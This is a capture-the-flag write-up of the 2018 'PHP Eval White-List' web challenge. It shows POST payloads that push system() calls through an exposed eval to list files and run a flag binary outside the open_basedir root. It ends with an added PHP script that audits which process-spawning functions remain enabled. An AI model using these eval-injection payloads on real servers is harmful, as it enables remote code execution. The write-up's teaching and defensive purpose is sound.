Tags: web 

Rating: 3.5

# PHP Eval White-List (Web): solved by 192/586 teams (32.8%)
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
PHP was dangerous, so we've fixed it!

http://c67f8ffd.quals2018.oooverflow.io

Files:websec_eval_wl.so
```

---

**【Understanding function and access restrictions】**

http://c67f8ffd.quals2018.oooverflow.io

```
PHP - Custom eval whitelisting!
PHP is dangerous, so we wrote a custom php extension to improve its security. We're also taking advantage of the open_basedir directive to prevent you from accessing the flag binary up the current folder. You can check the source of the page here.
```

There are two access restrictions:

```
・custom php extension: websec_eval_wl.so
・open_basedir directive
```

---

The source code is also provided:

http://c67f8ffd.quals2018.oooverflow.io/source.txt

```

<html>
<head>
<title>php as a service</title>
<link rel='stylesheet' href='bootstrap.min.css' />
</head>
<body>
<div id='main'>
<div class='container'>
<div class='row'>
<h1>PHP<small> - Custom eval whitelisting!</small></h1>
</div>
<div class='row'>


PHP is dangerous, so we wrote a custom php extension to
improve its security. We're also taking advantage of the open_basedir
directive to prevent you from accessing the flag binary up the current folder.
You can check the source of the page here.


</div>
</div>
<div class='container '>
<div class='row '>
<form action='' method='post' class="form-inline">
<div class="form-group">
<div class="input-group">
<div class="input-group-addon">Code to eval</div>
<input type='text' name='d' id='d' class="form-control" value='printf(1+1);'>

</div>
</div>
<div class="form-group">
<input type='submit' value='Run!' class="btn btn-default" name='submit'>
</div>
</form>
</div>
</div>


<div class='container'>


./flag binary?';
}?>


</div>
</div>
</body>
</html>
```

Arbitrary code can be executed, because the page passes the POST parameter straight to `eval`:

`eval($_POST['d']);`

---

**【Information gathering by arbitrary code execution】**

```
POST / HTTP/1.1
Host: c67f8ffd.quals2018.oooverflow.io
Content-Type: application/x-www-form-urlencoded

d=system("ls -al");&submit=Run
```

```
total 180
drwxr-xr-x 3 root root 4096 May 12 18:10 .
drwxr-xr-x 3 root root 4096 May 11 16:29 ..
-rw-r--r-- 1 root root 108376 May 5 04:58 bootstrap.min.css
-rw-r--r-- 1 root root 1672 May 12 18:09 index.php
-rw-r--r-- 1 root root 155 May 5 04:58 source.php
-rw-r--r-- 1 root root 1672 May 12 18:09 source.txt
d-wx-wx-wx 2 root root 16384 May 14 11:40 tmp
-rw-r--r-- 1 root root 33784 May 5 04:58 websec_eval_wl.so
```

The `tmp` folder is writable, but I can exploit the challenge without using it.

---

**【Identify the location of flag】**

The top page has the following hint:

`Can you execute the ./flag binary?`

---

I searched for the executable flag:

× d= `system('file ./../../flag');` ⇒ `./../../flag: cannot open './../../flag' (No such file or directory)`

○ d= `system('file ./../flag');` ⇒ `./../flag: executable, regular file, no read permission`

× d= `system('file ./flag');` ⇒ `./flag: cannot open './flag' (No such file or directory)`

× d= `system('file ./tmp/flag');` ⇒ `./tmp/flag: ASCII text, with very long lines`  ※This is a fake flag

---

**【Exploit】**

d= `system(' ./../flag');`

`OOO{Fortunately_php_has_some_rock_solid_defense_in_depth_mecanisms,_so-everything_is_fine.}`
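Why the bypass works, as an added illustration that is not part of the writeup: `open_basedir` only constrains PHP's own file functions (`fopen`, `include`, `file_get_contents`, ...), while `system()` hands a path to the kernel, so a binary one level above the web root runs regardless. The script below, which assumes the challenge layout (flag binary beside the web root) and PHP 7.1 or later, shows the restriction firing on a direct read and audits which process-spawning functions are still callable, the check a defender wants next to any eval whitelist.

```php
<?php
// Added example: audit that open_basedir is paired with disable_functions.
// open_basedir never applies to child processes, so these must be disabled
// separately or eval'd code can still run a binary by path.
declare(strict_types=1);

// Functions that spawn a process or run a shell command.
const EXEC_FUNCTIONS = [
    'system', 'exec', 'shell_exec', 'passthru', 'popen', 'proc_open', 'pcntl_exec',
];

/** Names from EXEC_FUNCTIONS that the running PHP still allows. */
function exposed_exec_functions(): array
{
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    $exposed = [];
    foreach (EXEC_FUNCTIONS as $fn) {
        // PHP 8 removes disabled functions entirely (function_exists is false);
        // PHP 7 keeps a stub, so the disable_functions list is checked as well.
        if (function_exists($fn) && !in_array($fn, $disabled, true)) {
            $exposed[] = $fn;
        }
    }
    return $exposed;
}

/** True only if open_basedir (not a missing file) stopped the read. */
function basedir_blocks_read(string $root, string $target): bool
{
    ini_set('open_basedir', $root);   // can only be tightened at runtime
    error_clear_last();
    $ok = @file_get_contents($target) !== false;
    $err = error_get_last();
    return !$ok && $err !== null
        && strpos($err['message'], 'open_basedir restriction') !== false;
}

$root = __DIR__;                       // the web root in the challenge's terms
$outside = dirname($root) . '/flag';   // sibling of the web root, as in the writeup

printf("read of %s blocked by open_basedir: %s\n",
    $outside, basedir_blocks_read($root, $outside) ? 'yes' : 'no');

$exposed = exposed_exec_functions();
if ($exposed) {
    // Each entry can execute that same path; the fix lives in php.ini:
    //   disable_functions = system,exec,shell_exec,passthru,popen,proc_open,pcntl_exec
    printf("process-spawning functions still callable: %s\n", implode(', ', $exposed));
} else {
    echo "no process-spawning functions callable\n";
}
```

Run it from the web root with `php`; a stock configuration reports the read as blocked and every function in the list as still callable, which is exactly the gap the challenge's `system('./../flag')` payload walks through.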